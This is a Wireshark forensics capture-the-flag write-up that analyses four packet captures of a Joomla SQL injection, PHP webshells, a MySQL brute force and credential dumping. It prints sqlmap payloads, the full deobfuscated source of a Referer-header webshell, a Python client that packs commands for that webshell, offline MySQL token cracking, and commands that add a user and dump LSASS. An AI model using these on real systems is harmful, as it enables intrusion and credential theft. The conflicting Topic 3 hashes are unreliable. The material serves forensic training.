Foreword
Packet analysis with Wireshark is a core security skill: the same tool serves for diagnosing network problems, detecting attacks, monitoring traffic, and recovering malware and attacker tooling from a capture.
What follows is a four-part traffic analysis exercise. It needs four capture files, 1.pcap to 4.pcap, which are shared on the network disk below (extract the archive yourself):
Link: https://pan.baidu.com/s/1gTL_l0Xk2xP3ZNWYvBWi8g?pwd=d6g7
Extraction code: d6g7
1. Topic 1 (1.pcap)
Topic requirements:
1. The IP address of the network card of the first victim host attacked by the hacker
2. Which URL parameter the hacker performed SQL injection through
3. The table prefix of the first victim host's website database (with the trailing underscore, e.g. abc_)
4. The name of the first victim host's website database
The questions are about SQL injection, so start with the display filter http (TLS traffic cannot be inspected without the server's key, so filtering on https would show nothing useful here).
After filtering, two addresses dominate the conversation, 202.1.1.2 and 192.168.1.8, and the requests make it obvious that 202.1.1.2 is attacking 192.168.1.8.
That answers the first question: the victim host's network card address is 192.168.1.8, and 202.1.1.2 is the attacker.
Next look only at HTTP requests whose source is 202.1.1.2:
ip.src == 202.1.1.2 && http.request
Taking one request and URL-decoding its query string gives the following.
It is a UNION-based SQL injection into the Joomla com_contenthistory component (this request shape matches the public Joomla list[select] injection, CVE-2015-7857). The <script>alert("XSS")</script> string is a marker rather than a stored XSS attempt: if it comes back in the response, the attacker knows the injected column is reflected into the page.
option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(&XfqR=2916 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',tab
Another request, URL-decoded the same way, shows the same parameter being probed with an error-based payload. The CONCAT/ELT construction and the 0x71717a7671 prefix (the ASCII marker qqzvq that sqlmap wraps around extracted values) identify the tool as sqlmap, and the injection point is list[select]:
option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,(SELECT (ELT(883
Now follow the TCP stream of one of these injection requests (right-click, Follow, TCP Stream).
The server's error response shows the database is MariaDB, and the quoted failing SQL contains the table prefix: ajtuc_.
For the database name, look at the last requests of the session: once sqlmap has confirmed the injection it enumerates information_schema, so a request whose SQL contains the schema keyword (table_schema=...) carries the database name as a hex literal.
Decoding that hex literal gives joomla (joomla in hex is 0x6a6f6f6d6c61).
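The steps above (URL-decode the query, find the parameter carrying SQL, read the hex literals, recognise sqlmap's q???q markers) as a short script. This is an added example, not code from the original write-up or from sqlmap; the request it parses is constructed to resemble the sqlmap traffic in 1.pcap, and the host, path and exact SQL text are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, urlencode

# Words that show up in a query value only when SQL is being injected into it.
SQL_HINTS = re.compile(r"\b(UNION|SELECT|CONCAT|ELT|information_schema)\b", re.I)
# MySQL hex string literal, e.g. 0x6a6f6f6d6c61.
HEX_LIT = re.compile(r"\b0x([0-9a-fA-F]+)\b")
# sqlmap brackets error-based output with 5-letter markers of the form q???q.
SQLMAP_MARKER = re.compile(r"^q[a-z]{3}q$")

# Constructed request in the shape of the sqlmap traffic (not a packet from the capture).
INJECTED_SQL = ('(" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,'
                '(SELECT table_name FROM information_schema.tables '
                'WHERE table_schema=0x6a6f6f6d6c61 LIMIT 0,1),0x717a6b7a71,0x78))s), '
                '8446744073709551610, 8446744073709551610)))')
SAMPLE_URL = "http://192.168.1.8/index.php?" + urlencode({
    "option": "com_contenthistory", "view": "history", "list[ordering]": "",
    "item_id": "1", "type_id": "1", "list[select]": INJECTED_SQL})


def injected_param(url):
    """Return (name, decoded value) of the first query parameter carrying SQL, else None."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if SQL_HINTS.search(value):
            return name, value
    return None


def decode_hex_literals(sql):
    """Map every 0x... literal in the SQL to its decoded text (skips non-UTF-8 blobs)."""
    out = {}
    for lit in HEX_LIT.findall(sql):
        if len(lit) % 2:
            continue
        try:
            out["0x" + lit] = bytes.fromhex(lit).decode("utf-8")
        except UnicodeDecodeError:
            continue
    return out


def sqlmap_markers(decoded):
    """Decoded literals that look like sqlmap's prefix/suffix markers."""
    return sorted(s for s in decoded.values() if SQLMAP_MARKER.match(s))


if __name__ == "__main__":
    name, sql = injected_param(SAMPLE_URL)
    literals = decode_hex_literals(sql)
    print("injection point:", name)
    print("hex literals:", literals)
    print("sqlmap markers:", sqlmap_markers(literals))
```

Run over a list of request URIs exported from Wireshark (File, Export Packet Dissections, or tshark -T fields -e http.request.uri), the same three functions pick out the injected parameter and the schema name without reading each request by hand.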
Answer:
1. The IP address of the network card of the first victim host attacked by the hacker
192.168.1.8
2. Which URL parameter the hacker performed SQL injection through
list[select]
3. The table prefix of the first victim host's website database (with the trailing underscore, e.g. abc_)
ajtuc_
4. The name of the first victim host's website database
joomla
2. Topic 2 (2.pcap)
Open 2.pcap
Topic requirements:
1. What is the password of the PHP webshell the hacker obtained the first time?
2. When did the hacker upload the PHP webshell the second time?
3. Which HTTP header does the second uploaded webshell transmit its data through?
The question asks for the webshell password. A one-line PHP webshell (the "one sentence Trojan") is driven by POST requests, so filter those first:
http.request.method == "POST"
One host keeps POSTing to a file named kkkaaa.php, which is suspicious on its own: no legitimate application names its files like that. Opening one of those packets shows this form field:
Form item: "zzz" = "@eval(base64_decode($_POST[z0]));"
That settles the password: the parameter that receives the code is zzz, so the shell on the server should be
<?php eval($_POST['zzz']);?>
The client sends eval(base64_decode($_POST[z0])); as the value of zzz, which in turn base64-decodes and runs whatever arrives in z0; z0 carries the actual malicious PHP, base64-encoded.
Decoding that first z0 shows a call to dirname(). That is not a directory listing: dirname() returns the directory part of a path, and the client calls it on the script's own path to learn the web root it is operating in, which is the usual first request of this family of webshell clients.
The second question asks when the second webshell was uploaded.
With no other clue, compare the filtered POST packets: their parameters are alike, so the Length column is what matters.
The first request is naturally a bit longer than the rest, but the fourth one stands out, about 150 bytes longer than the others.
Follow its TCP stream.
The z2 parameter is clearly abnormal: the other parameters are URL-encoded base64, while z2 is hex-encoded.
Decoding the hex yields PHP that is obfuscated so that it cannot be read directly.
Deobfuscated, the code is:
<?php
// Two key halves: together they form the XOR key and the response wrapper tag.
$kh = "cb42";
$kf = "e130";

// Repeating-key XOR of $t with $k. The braces are PHP's old string-offset
// syntax, removed in PHP 8 ($t[$i] is the modern equivalent).
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}

$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];          // carries the payload chunks in its query string
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];  // carries the session id and the chunk order
if ($rr && $ra) {
    $u = parse_url($rr);
    parse_str($u["query"], $q);
    $q = array_values($q);          // Referer query values, in order
    // One match per language tag: its first letter and the digit after q=0.
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
    if ($q && $m) {
        @session_start();
        $s =& $_SESSION;
        $ss = "substr";
        $sl = "strtolower";
        $i = $m[1][0] . $m[1][4];               // session id: first letters of tags 1 and 5
        $h = $sl($ss(md5($i . $kh), 0, 3));      // start marker
        $f = $sl($ss(md5($i . $kf), 0, 3));      // end marker
        $p = "";
        // Reassemble this request's chunk: the q= digit of each tag (from the 2nd on)
        // is the index of the Referer query value to append.
        for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]];
        if (strpos($p, $h) === 0) {              // start marker seen: new buffer
            $s[$i] = "";
            $p = $ss($p, 3);
        }
        if (array_key_exists($i, $s)) {
            $s[$i] .= $p;                        // accumulate across requests
            $e = strpos($s[$i], $f);             // end marker: whole payload received
            if ($e) {
                $k = $kh . $kf;
                ob_start();
                // URL-safe base64 -> XOR -> gzuncompress -> eval
                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));
                $o = ob_get_contents();
                ob_end_clean();
                // Output goes back the same way, wrapped in <cb42e130>...</cb42e130>
                $d = base64_encode(x(gzcompress($o), $k));
                print("<$k>$d</$k>");
                @session_destroy();
            }
        }
    }
}
?>
Searching the decoded payload turns up create_function(), which can run arbitrary code: the PHP manual marks it deprecated since 7.2.0 and removed in 8.0.0, with the same security implications as eval().
So the attacker used create_function() to write and install a second webshell of their own.
For the time, press Ctrl+F, search Packet details as a String for a fragment of that payload, and read the arrival time of the matching frame. Wireshark displays it in the time zone of the analysis machine, so state the zone with the answer:
Feb 7, 2018 17:20:44.248365000 China Standard Time
Now analyze this second webshell.
To be usable it has to read its instructions out of the request, and two lines show where from:
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
They read the Referer and Accept-Language request headers, so those two fields are how the attacker delivers the commands to execute.
Looking at a request for footer.php confirms it: the Referer is abnormally long, while the Accept-Language looks like any browser's. In this agent the Accept-Language carries only the session id and the order in which the Referer query values are reassembled, which is why it stays short.
The second webshell therefore transmits its data through the Referer header of the HTTP protocol.
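Both sides of the channel the deobfuscated code implements, re-implemented in Python so that a captured Referer/Accept-Language pair can be decoded, and a response body unwrapped, without running the PHP. This is an added example written for this page; it is not the attacker's code, and the key halves cb42/e130 are the ones hard-coded in the captured agent. The cover language tags, the chunk placement (SLOTS) and the Referer host are assumptions; the real client may choose them differently, but the agent accepts anything that fits its regex.

```python
import base64
import hashlib
import re
import zlib
from urllib.parse import urlsplit, parse_qsl

KH, KF = "cb42", "e130"            # the two key halves hard-coded in the captured agent
KEY = (KH + KF).encode()            # XOR key: $kh . $kf
# Same pattern the agent applies to Accept-Language: first letter of each tag, and its q= digit.
TAG_RE = re.compile(r"([\w])[\w-]+(?:;q=0.([\d]))?,?")


def x(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the agent's x() function."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def markers(session_id: str):
    """Start/end markers: first 3 hex chars of md5(id . $kh) and md5(id . $kf)."""
    h = hashlib.md5((session_id + KH).encode()).hexdigest()[:3]
    f = hashlib.md5((session_id + KF).encode()).hexdigest()[:3]
    return h, f


# Assumed cover values. Session id = tag1[0] + tag5[0] ("e" + "i" here).
# SLOTS are the q= digits of tags 2..6: which Referer query value holds each chunk.
LANGS = ["en-US", "zh-CN", "de", "fr", "it", "es"]
SLOTS = [2, 0, 4, 1, 3]


def build_request(payload: str):
    """Client side: hide PHP `payload` in a Referer URL plus an Accept-Language header."""
    sid = LANGS[0][0] + LANGS[4][0]
    h, f = markers(sid)
    blob = base64.b64encode(x(zlib.compress(payload.encode()), KEY)).decode()
    blob = blob.replace("+", "-").replace("/", "_")       # the agent maps - and _ back
    if f in blob:                                          # the end marker is only 3 chars
        raise ValueError("end marker occurs inside the data; the agent would truncate it")
    msg = h + blob + f
    n = len(SLOTS)
    size = -(-len(msg) // n)                               # ceil(len/n)
    chunks = [msg[k * size:(k + 1) * size] for k in range(n)]
    values = [""] * n
    for k, slot in enumerate(SLOTS):
        values[slot] = chunks[k]
    referer = "http://example.test/?" + "&".join(f"v{j}={v}" for j, v in enumerate(values))
    accept_language = LANGS[0] + "," + ",".join(f"{t};q=0.{d}" for t, d in zip(LANGS[1:], SLOTS))
    return referer, accept_language


def agent_decode(referer: str, accept_language: str):
    """Server side: the PHP the agent would eval, or None if the request is not for it."""
    m = TAG_RE.findall(accept_language)
    letters, digits = [a for a, _ in m], [d for _, d in m]
    if not letters:
        return None
    sid = letters[0] + (letters[4] if len(letters) > 4 else "")   # PHP: undefined index -> ""
    h, f = markers(sid)
    q = [v for _, v in parse_qsl(urlsplit(referer).query, keep_blank_values=True)]
    p = ""
    for z in range(1, len(letters)):                        # the first tag's digit is never used
        d = digits[z]
        p += q[int(d)] if d and int(d) < len(q) else ""
    if not p.startswith(h):                                 # no start marker: ignored
        return None
    p = p[3:]
    e = p.find(f)
    if e <= 0:                                              # end marker missing: more chunks to come
        return None
    raw = base64.b64decode(p[:e].replace("_", "/").replace("-", "+"))
    return zlib.decompress(x(raw, KEY)).decode()


def agent_respond(output: str) -> str:
    """Server side: how the agent wraps command output in the HTTP response body."""
    k = KH + KF
    return f"<{k}>" + base64.b64encode(x(zlib.compress(output.encode()), KEY)).decode() + f"</{k}>"


def decode_response(body: str) -> str:
    """Client side: pull the command output back out of a captured response body."""
    k = KH + KF
    d = re.search(f"<{k}>(.*?)</{k}>", body, re.S).group(1)
    return zlib.decompress(x(base64.b64decode(d), KEY)).decode()


if __name__ == "__main__":
    ref, al = build_request('echo shell_exec("dir");')
    print("Referer:", ref)
    print("Accept-Language:", al)
    print("agent runs:", agent_decode(ref, al))
```

For a real capture, feed agent_decode the Referer and Accept-Language of each request to footer.php in order; a payload that spans several requests will return None until the request carrying the end marker arrives. decode_response applied to the response bodies recovers the command output, which is what makes this channel detectable even though nothing in the URL or POST body looks malicious.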
Answer
1. What is the password of the PHP webshell the hacker obtained the first time?
zzz
2. When did the hacker upload the PHP webshell the second time?
Feb 7, 2018 17:20:44.248365000 China Standard Time
3. Which HTTP header does the second uploaded webshell transmit its data through?
Referer
3. Topic 3 (3.pcap)
Open 3.pcap
Topic requirements:
1. What are the MySQL user name of the intranet host and the password hash sent in the connection request (user:password hash)?
2. Which IP address did the PHP proxy connect to first when it was used for the first time?
The question is about MySQL traffic, so filter for it directly:
tcp contains "mysql" && mysql
The attacker has been brute-forcing MySQL passwords. The last login attempt in the series is the likely success; confirm it by the server's reply, since a correct token is answered with an OK packet (first payload byte 0x00) and a wrong one with an ERR packet (0xff, "Access denied"). Note that what Wireshark labels as the password is not a reusable credential: with mysql_native_password the client sends a 20-byte token derived from SHA1 of the password and the salt in the server greeting, which is why the question calls it a hash.
User: admin
Password hash: 4858e7dcb0968daa7b599be4b0edb88a25ad89ac
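The parsing and the check described above, as an added example that is not part of the original write-up: it reads the user name and token out of a MySQL login packet the way Wireshark's dissector does, classifies the server's reply, and shows why the token is worth recovering at all, since mysql_native_password tokens can be checked offline against candidate passwords once the salt from the server greeting is known. The salt, the login packet and both replies are constructed here, not taken from 3.pcap.

```python
import hashlib
import struct

CLIENT_LONG_PASSWORD = 0x1
CLIENT_PROTOCOL_41 = 0x200
CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x80000


def native_password_token(password: str, salt: bytes) -> bytes:
    """mysql_native_password: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw))), 20 bytes."""
    stage1 = hashlib.sha1(password.encode()).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mix = hashlib.sha1(salt + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mix))


def build_login_packet(user: str, password: str, salt: bytes, seq: int = 1) -> bytes:
    """HandshakeResponse41 as a client sends it (constructed for the demo)."""
    flags = CLIENT_LONG_PASSWORD | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
    token = native_password_token(password, salt)
    body = struct.pack("<IIB", flags, 16 * 1024 * 1024, 33) + b"\x00" * 23  # flags, max packet, charset, reserved
    body += user.encode() + b"\x00" + bytes([len(token)]) + token
    body += b"mysql_native_password\x00"
    return len(body).to_bytes(3, "little") + bytes([seq]) + body


def parse_login_packet(packet: bytes):
    """Return (user, token_hex) from a captured HandshakeResponse41 (header included)."""
    length = int.from_bytes(packet[:3], "little")
    body = packet[4:4 + length]
    flags = struct.unpack_from("<I", body, 0)[0]
    off = 4 + 4 + 1 + 23
    end = body.index(b"\x00", off)
    user = body[off:end].decode()
    off = end + 1
    if flags & CLIENT_SECURE_CONNECTION:       # length-prefixed token (shown by Wireshark as Password)
        n = body[off]
        token = body[off + 1:off + 1 + n]
    else:                                      # legacy NUL-terminated form
        token = body[off:body.index(b"\x00", off)]
    return user, token.hex()


def reply_kind(packet: bytes) -> str:
    """Classify the server's answer to a login: OK means the token was right."""
    return {0x00: "OK", 0xFF: "ERR", 0xFE: "AUTH_SWITCH"}.get(packet[4], "OTHER")


def crack_token(token_hex: str, salt: bytes, wordlist):
    """Offline check of candidate passwords against a captured token and its salt."""
    for cand in wordlist:
        if native_password_token(cand, salt).hex() == token_hex:
            return cand
    return None


# Constructed exchange: 20-byte salt from the greeting, one login, the two possible replies.
SALT = b"abcdefghij0123456789"
LOGIN = build_login_packet("admin", "admin", SALT)
OK_BODY = b"\x00\x00\x00\x02\x00\x00\x00"                 # OK, affected rows, insert id, status, warnings
OK_REPLY = len(OK_BODY).to_bytes(3, "little") + b"\x02" + OK_BODY
ERR_BODY = b"\xff\x15\x04#28000Access denied"             # ERR, code 1045, SQLSTATE 28000
ERR_REPLY = len(ERR_BODY).to_bytes(3, "little") + b"\x02" + ERR_BODY

if __name__ == "__main__":
    user, token = parse_login_packet(LOGIN)
    print(f"{user}:{token}")
    print("server said:", reply_kind(OK_REPLY), "/", reply_kind(ERR_REPLY))
    print("offline guess:", crack_token(token, SALT, ["root", "123456", "admin"]))
```

The salt is the 20-byte challenge in the server greeting (8 bytes of auth-plugin-data-part-1 plus 12 of part 2, as Wireshark labels them); take it from the same TCP stream as the login you are checking, because every connection gets a fresh one.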
Next filter the HTTP requests; they reveal a PHP file named tunnel.php, a PHP proxy.
Opening its first use shows clearly that the first address the proxy connected to is 4.2.2.2, port 53.
Answer
1. What are the MySQL user name of the intranet host and the password hash sent in the connection request (user:password hash)?
admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4
(The analysis above shows a different token, 4858e7dcb0968daa7b599be4b0edb88a25ad89ac; the right one is the token in the login request that the server answered with an OK packet, so check it against the capture.)
2. Which IP address did the PHP proxy connect to first when it was used for the first time?
4.2.2.2
4. Topic 4 (4.pcap)
Open 4.pcap
Topic requirements:
1. When did the hacker first exploit the vulnerability to obtain the file list of the current directory?
2. What username and password did the hacker add to the internal host?
3. The name of the file the hacker downloaded from the intranet server
The commands that list the current directory are dir on Windows and ls on Linux, so filter for both:
(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "dir" || http contains "ls")
Both ls and dir occur (http contains is a substring match, so expect noise such as "directory"; follow the stream of each hit to confirm it).
Following the TCP streams shows that the first ls did not succeed, since the server returned no output.
The second request, dir, did succeed.
Read the arrival time of that request:
Feb 7, 2018 18:36:59.770782000 China Standard Time
Adding a user on Windows goes through net user (net user <name> <password> /add), and a listing of accounts echoes Administrator, so filter for both strings:
(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "user" || http contains "Administrator")
At this point in the capture the new user does not exist yet; time Feb 7, 2018 18:49:27.767754000 China Standard Time
Further on, the user kaka has been added as an administrator; time
Feb 7, 2018 18:50:42.908737000 China Standard Time
So the command that added the user must have been executed between those two moments.
Restrict the HTTP requests to that window with a time filter (the relative times below are the frame.time_relative values of those two frames in this capture):
(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http && frame.time_relative >= 827.109385 && frame.time_relative <= 902.267039
This turns up one unusual request.
base64-decoding its body gives
cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user kaka kaka /add&echo [S]&cd&echo [E]
Username and password: kaka:kaka
The last question is about a download. The webshell again works over POST, and the intranet host being attacked here is 192.168.2.20, so filter:
ip.dst == 192.168.2.20 && http.request.method == "POST"
There is no shortcut after that: go through the matches one at a time and base64-decode each body.
Near the end is this request.
It decodes to:
cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&procdump.exe -accepteula -ma lspasss.dmp&echo [S]&cd&echo [E]
So procdump.exe was run, the standard way to take a full memory dump of LSASS for offline credential extraction.
Looking further, another request
decodes to:
C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp
That confirms the file the hacker downloaded: lsass.exe_180208_185247.dmp
(the name follows procdump's default process_YYMMDD_HHMMSS.dmp pattern, with the timestamp taken from the victim's own clock).
Answer
1. When did the hacker first exploit the vulnerability to obtain the file list of the current directory?
Feb 7, 2018 18:36:59.770782000 China Standard Time
2. What username and password did the hacker add to the internal host?
kaka:kaka
3. The name of the file the hacker downloaded from the intranet server
lsass.exe_180208_185247.dmp